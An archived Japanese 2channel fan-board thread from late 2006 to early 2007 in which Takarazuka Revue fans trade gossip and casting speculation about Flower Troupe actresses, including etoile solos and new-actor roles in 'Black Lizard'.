今の花組でまっつなんかがエトワールやったら波紋を呼びますが?w

127 :名無しさん@花束いっぱい。:2006/12/31(日) 21:50:33 ID:DVlF8bhu
おすすめ2ちゃんねるって何?

おすすめ2ちゃんねるは、あるスレッドについて、そのスレッドを見ている人たちが、他にどんなスレッドを見ているかの統計を取って、上位8つのスレッドを紹介する仕組みです。

128 :名無しさん@花束いっぱい。:2006/12/31(日) 21:58:34 ID:6HccuPJi
ここ娘役スレなんだけどな…

129 :名無しさん@花束いっぱい。:2006/12/31(日) 21:59:48 ID:4fUIKQtk
娘役のスレでいうのも変だが、
まっつエトワールなら、いいところに落ち着いたといわれそうだね。

130 :名無しさん@花束いっぱい。:2006/12/31(日) 22:10:21 ID:X3d89di9
とりあえずID:25qQ9n0sはスルーの方向で

上にあったけど娘役複数エトワールもいいね。
花組じゃ到底ありえないだろうけどもorz

131 :名無しさん@花束いっぱい。:2006/12/31(日) 22:41:49 ID:My1ERomZ
でもオギーだからね・・・orz
タランテラもエトワールはなかった(´・ω・`)

132 :名無しさん@花束いっぱい。:2007/01/01(月) 00:16:01 ID:dU8DF6G4
JAZZはオーソドックスに行くと言ってたらしいから
ちょっとだけ期待(´Д`*)ハァハァ

133 :名無しさん@花束いっぱい。:2007/01/01(月) 00:43:28 ID:l8qBeGls
さあや・もえりん・くまくま辺りにエトワールを付けてあげたいけど
花組なので虐められて、退団なんてことになったらいやだなぁ…。

134 :名無しさん@花束いっぱい。:2007/01/01(月) 02:32:41 ID:OetbyIEt
くまはまだ研3だし、見た目が・・・(ry
新公ベラドーヴァもイマイチだったよね・・・。

135 :名無しさん@花束いっぱい。:2007/01/01(月) 08:02:24 ID:b65AeP0Z
エンカレ組からエト探そうとしたら、3人も辞めてんだね。
改めてショックが…

136 :名無しさん@花束いっぱい。:2007/01/01(月) 11:27:35 ID:l8qBeGls
ありえないけど…
くまくま・さあや・もえりんの並びで
で初々しく美しく歌い、
えりさん・シビで
最後に威厳ありの締めなんても見てみたい。

137 :名無しさん@花束いっぱい。:2007/01/01(月) 11:45:03 ID:mxUj7x4H
絵莉さんって歌は文句なしにうまいけれど、
真ん中でスポット浴びて歌うには今ひとつ
押し出しというか華というか存在感が足りない。

歌姫路線な育ち方をしていないからかしら。

138 : 【吉】 【1902円】 :2007/01/01(月) 12:34:24 ID:zK/DCFjw
えりさんって全ツでは何回かエトワールされてますよね?
何故本公演ではないのかちょっと不思議。
路線外でもタキちゃんは結構回数多かったような・・・。

押し出しが弱いせい?

139 :名無しさん@花束いっぱい。:2007/01/01(月) 12:44:28 ID:mxUj7x4H
タキちゃんはヒロイン路線じゃなかったけれど、
優等生で新人の頃からバリバリ歌姫路線で使われた人だったはず。

140 :名無しさん@花束いっぱい。:2007/01/01(月) 13:07:01 ID:KaKZSgZF
タキさん、本公演のエトワールは割と遅めだった様な、ワンナイト・ミラージュだっけ?
やっとだね、みたいに言われてた記憶がある。
こけしさんや久瑠実さんがいたからね、
ジュンベさんもエトワールすることあったし。
スレ違いスマソ。

141 : 【吉】 【470円】 :2007/01/01(月) 16:13:32 ID:XoIy2gaE
主な配役    本公演     新人公演
明智小五郎  春野寿美礼  朝夏まなと
黒トカゲ     桜乃彩音   野々すみ花

142 :名無しさん@花束いっぱい。:2007/01/01(月) 17:19:12 ID:SI3kCMAV
新公ヒロイン、すみ花ちゃんだったね。
早苗さんは誰になるだろう。
あと、小林少年。

143 :名無しさん@花束いっぱい。:2007/01/01(月) 17:41:15 ID:PiBdvFKj
すみ花、耐えろ。たえるんだ

144 :名無しさん@花束いっぱい。:2007/01/01(月) 19:04:20 ID:IMAORk+5
やっぱりね。
すみ花ちゃん新公ヒロイン結構前に決まってたんだね。
だからそれを知った二人はやめちゃったんだね。

145 :名無しさん@花束いっぱい。:2007/01/01(月) 19:07:54 ID:dy3lXs5r
スーは違うよ…

146 :名無しさん@花束いっぱい。:2007/01/01(月) 20:57:46 ID:dU8DF6G4
>137
うたかたが初だと思われるが

147 :名無しさん@花束いっぱい。:2007/01/01(月) 21:03:06 ID:SI3kCMAV
>146
絵莉さんのエトワール?
『ビューティズ』の代役じゃなかったかな?

148 : 【吉】 【1412円】 :2007/01/01(月) 21:03:20 ID:l8qBeGls
きらりは今回は早苗か小林少年か。
意外と蘭乃に続いて早苗辺りに抜擢されそう。
それならすみ花との衣装を借りるときのいざこざとかも
無さそうだし。
さあや、きらり早苗がよさそう。

149 :147:2007/01/01(月) 21:17:21 ID:SI3kCMAV
歌の大きな役の事かな?
後、『琥珀』の『奥様 お手をどうぞ』があるけど。

150 :名無しさん@花束いっぱい。:2007/01/01(月) 21:58:10 ID:dU8DF6G4
>149
ごめん、レスアンカー間違えた。
全ツのエトワールのことorz

151 :名無しさん@花束いっぱい。:2007/01/02(火) 23:18:46 ID:K6m4yPCv
>148
きらりみたいに小柄でない娘役に「少年役」は回らないよ。


152 :名無しさん@花束いっぱい。:2007/01/03(水) 00:26:22 ID:+neVKCld
きらりちゃんが小林少年役になるとは思わないが、長身のウメちゃんがアンドレの少年時代をした事はあるよ。それにしても他組とはいえ、わけの分からない娘役と書かれた音花ゆりちゃんは可哀想。童謡CDを出したナル、たっちん、かおりの同期4人娘のメンバーの一人だよ。

153 :名無しさん@花束いっぱい。:2007/01/03(水) 10:33:17 ID:QHz4Znkc
>>148
ごめん。148だけど、蘭乃に続いてって言うのは、月野の事ね。

>>151
あぁそうか。小柄な娘役か。
意外と小柄な男役の可能性もあり得るような。

154 :名無しさん@花束いっぱい。:2007/01/03(水) 13:14:14 ID:MZabEVB+
>>152
当時のウメは、スタイルや仕草が少年っぽかったから回ったんだよ。
要するに娘役らしくなかっただけど、それが良い方に働いた。

155 :名無しさん@花束いっぱい。:2007/01/03(水) 16:45:49 ID:BKszKkh9
でも早苗以外の主要娘役全員少年だからなあ

156 :名無しさん@花束いっぱい。:2007/01/03(水) 17:32:44 ID:ROpsIgFf
愛原さんも長身だけど、少年時代のアンドレでしたね。
きらりちゃんが小林少年をするかはおいといて、
彼女の身長は160センチぐらいだから大きくもなく
小さくもなく、だと思います。

157 :名無しさん@花束いっぱい。:2007/01/03(水) 21:31:51 ID:aUw5tfZS
身長のことは置いといても、きらりは持ち味が全然少年ではないのだが。

158 :名無しさん@花束いっぱい。:2007/01/03(水) 22:08:47 ID:BKszKkh9
持ち味じゃなくても今回ほとんど少年だから
ありえるんじゃね?ってことなんですが

159 :名無しさん@花束いっぱい。:2007/01/03(水) 23:18:47 ID:aFwkSEeO
本役がきらりより学年下だけど
やっぱり早苗はきらりで見たいなあと思ったり…

小林少年に下級生から抜擢して欲しい。

まあ抜擢するなら早苗役なのかな?
本役がすみ花だし


160 :名無しさん@花束いっぱい。:2007/01/03(水) 23:41:22 ID:ROpsIgFf
早苗には同期だったり、一年ぐらい上の上級生がすることも有り得るんじゃない?

161 :名無しさん@花束いっぱい。:2007/01/04(木) 00:14:09 ID:2BPRphTI
意外に彩音が新公では早苗だったりして・・・・・・

162 :名無しさん@花束いっぱい。:2007/01/04(木) 00:42:31 ID:LzUNo+Nj
トプ娘1が、勉強の場である新公で、ちゃんと名前のある役をやることはないよ。
いくら勉強が必要な彩音でも。

163 :名無しさん@花束いっぱい。:2007/01/04(木) 01:51:28 ID:nCKuANl+
>160
普通にありうるけど
すみ花ってまだ研2であまりにも下級生だから
やぱ上級生が早苗役になると気まずいというかしんどいかなと。
下級生ならすんなりおさまるかと思って。

きらりが私ん中では本命。

164 :名無しさん@花束いっぱい。:2007/01/04(木) 09:35:41 ID:yJzrgWjR
>上級生が早苗役になると気まずいというかしんどいかなと

劇団そんなのいちいち考えてませんて
ヒロイン経験者が皆無だから抜擢しそうではあるけどね。

165 :名無しさん@花束いっぱい。:2007/01/04(木) 12:29:28 ID:eWOu6qZQ
上げると、何か気まずい・・・

166 :名無しさん@花束いっぱい。:2007/01/04(木) 13:36:12 ID:MDQkJj3p
じゃあ、上げるなよ…

167 :名無しさん@花束いっぱい。:2007/01/04(木) 18:56:07 ID:9iN3LpCk
>161
それだけは絶対にない。
主演娘役が新公に出るときは、その他大勢と昔から決まっている。

168 :名無しさん@花束いっぱい。:2007/01/04(木) 20:03:38 ID:2BPRphTI
雪組『風と共に去りぬ』の花總は・・・・・・

169 :名無しさん@花束いっぱい。:2007/01/04(木) 20:22:52 ID:mFkXFYWn
>168
トップ娘役としては次の“雪之丞”からになるんじゃない?

170 :名無しさん@花束いっぱい。:2007/01/04(木) 23:31:24 ID:RJv1BFrD
>164
一応さーやが延陽伯やってる。
スー子がヒロインやったことになるなら
こっちも入れるべきね。

171 :名無しさん@花束いっぱい。:2007/01/05(金) 10:36:40 ID:s3MZp69D
とりあえず、ヒロイン経験者ときわめてそれ近い
さあや・きらりで小林少年と早苗を分けるんじゃないかな。
でも、もしも由舞が入ってきた場合はどちらかがベテランの役に入る。
逆に由舞が入らない場合は由舞はダンスが凄いんだからとしこさんのサソリ、
きらりもダンスなんだからサソリに。
きらりサソリ、由舞小林少年、さあや早苗もありえるかなぁ…。
つーか、キムシンの事だから少年探偵団は皆同じ程度の役だろうな。
ぶっちぎりの2番手になれそうな人が居ない今しょうがないんだろうが。。。


172 :名無しさん@花束いっぱい。:2007/01/05(金) 13:48:21 ID:Y8LTEILW
むしろさーやがサソリやるんじゃないかね
カルロッタとか怪演してるし
ヒロイン系はこないよいな気がする

173 :名無しさん@花束いっぱい。:2007/01/05(金) 14:38:34 ID:F52AuoSH
由舞はりおん並に台詞大根だからカンベン。
小林少年→さあや
早苗はすみ花の同期か研一の成績1番の子
のようなきがス
ところでシビさん、ショーしか出ないの?

174 :名無しさん@花束いっぱい。:2007/01/05(金) 15:12:58 ID:6xJbHuuR
さーやのサソリ見たい!
萌子でも見てみたいけど…ところで萌子ってダンサー?

175 :名無しさん@花束いっぱい。:2007/01/05(金) 17:40:39 ID:F52AuoSH
サソリってどんな役なの?

176 :名無しさん@花束いっぱい。:2007/01/05(金) 18:53:41 ID:6ZyT1QYI
萌子はどっちかっていうとシンガーじゃないかな?

177 :名無しさん@花束いっぱい。:2007/01/05(金) 20:23:04 ID:qgLKYZtD
萌子かー、去年のワークショップでのダンスはなかなかだったぞ!
踊れるんだーー!と感心した覚えがある。

178 :名無しさん@花束いっぱい。:2007/01/05(金) 21:38:16 ID:oD4ydV2f
もしサソリがマラケシュの蛇みたいな役だったら、新公はユマで観てみたいな。
身体の線出まくり衣装で、無言で踊り続けるだけだったら最高。

花は少年少女っぽい下級生娘役が少ないね。

179 :名無しさん@花束いっぱい。:2007/01/06(土) 00:36:19 ID:RefuWXS6
何それ。キモすぎ。

180 :名無しさん@花束いっぱい。:2007/01/06(土) 08:53:45 ID:4822frD8
萌子、エンカレ出たしシンガーじゃね?
ただ、パリ祭DSとゆみこDSでもダンス良かったし

181 :名無しさん@花束いっぱい。:2007/01/07(日) 00:34:17 ID:XK14pk4N
くまくまとかはナシ?


182 :名無しさん@花束いっぱい。:2007/01/08(月) 08:30:29 ID:TESodu1S
くまくまは秋園美緒ちゃんみたいになりソ
もちっと痩せてほしいが

183 :名無しさん@花束いっぱい。:2007/01/08(月) 20:20:21 ID:sfB3EKGw
もちっと、上がってて欲しい・・・

184 :名無しさん@花束いっぱい。:2007/01/08(月) 20:43:29 ID:HU2T6S2X
くまは見た目が無理。非路線系。
エトワールでも見苦しいよ。

185 :名無しさん@花束いっぱい。:2007/01/08(月) 23:39:43 ID:RDJeQoFZ
きらり・萌子・由舞あたりはこれから結構押されると思う。
特に萌子。ナルが退団し若手綺麗系歌姫が居ない今チャンス。

186 :名無しさん@花束いっぱい。:2007/01/09(火) 00:04:48 ID:69Ql6gv5
>ナルが退団し若手綺麗系歌姫
さーやがおりますから

187 :名無しさん@花束いっぱい。:2007/01/09(火) 09:53:46 ID:4Lu95TLT
さーやは好きだが、どうも容姿で前娘1を思い出すので
その点が私的に減点だったりする。
前娘1も好きだが娘1でいた彼女が好きじゃなかったw

188 :名無しさん@花束いっぱい。:2007/01/09(火) 18:13:16 ID:8LkdPlaC
>>186
そんな喧嘩腰みたいなレスせんでもw
さーやがいたって、萌子も使われるかもしれないし、
いっぱい可愛い花娘が使われた方がよろしいがな。
まぁ、余所から来ちゃうかもしれないけどね。

189 :名無しさん@花束いっぱい。:2007/01/10(水) 09:02:37 ID:JniDHrTd
>188
どこが喧嘩腰?



190 :名無しさん@花束いっぱい。:2007/01/10(水) 15:57:24 ID:UpXEOwH1
ところでナルとスー子はどうして集合日でやめたか、
もう話せる人いる?

191 :名無しさん@花束いっぱい。:2007/01/10(水) 17:17:26 ID:PyMFuVyY
>190
つぶやきあさってみるよろし

192 :名無しさん@花束いっぱい。:2007/01/10(水) 17:22:37 ID:jpcyUwAv
>>191
あれはどっちの話?
ふたりともそうなの?

193 :名無しさん@花束いっぱい。:2007/01/10(水) 17:28:32 ID:PyMFuVyY
>192
さあ、どっちだろうね。
学年やら立場を考えたらなんとなーくこっちかな?
なんて思うが…ってここで話してたら
情報落とした人がつぶやきに書いた意味ないんじゃないの?

194 :193:2007/01/10(水) 17:34:42 ID:PyMFuVyY
って教えたのは自分だったな(´ー`)y-~~
まあ、かたっぽはお食事会するらしいし
そのうち真実も出てくるんじゃないですかね

195 :名無しさん@花束いっぱい。:2007/01/10(水) 18:07:24 ID:UpXEOwH1
>>191
27日の書き込みですか?当時、その意見が多かったけど、
本当かなぁ?って。
そんなに自組にこだわる人だったとは思えないので。

196 :名無しさん@花束いっぱい。:2007/01/10(水) 19:13:07 ID:PyMFuVyY
>195
激しく見当違い

197 :名無しさん@花束いっぱい。:2007/01/10(水) 20:01:17 ID:UpXEOwH1
>>196
見当違いは
>27日の書き込みですか?

>そんなに自組にこだわる人だったとは思えないので
のどっちでしょうか??

43 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)